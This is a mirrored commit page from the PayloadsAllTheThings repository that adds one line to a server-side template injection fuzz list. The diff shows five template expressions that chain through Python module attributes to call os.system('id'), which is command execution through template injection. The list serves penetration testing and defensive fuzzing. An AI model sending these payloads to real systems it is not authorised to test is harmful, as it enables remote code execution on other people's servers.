mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
Update ssti.fuzz
This commit is contained in:
parent
2e1ca7710d
commit
b389464212
1 changed files with 1 additions and 0 deletions
|
@ -75,3 +75,4 @@ ${self.template.module.cache.util.compat.inspect.os.system("id")}
|
|||
${self.context._with_template.module.runtime.util.os.system("id")}
|
||||
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
|
||||
${self.template.module.runtime.util.compat.inspect.os.system("id")}
|
||||
${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
|
||||
|
|
Loading…
Reference in a new issue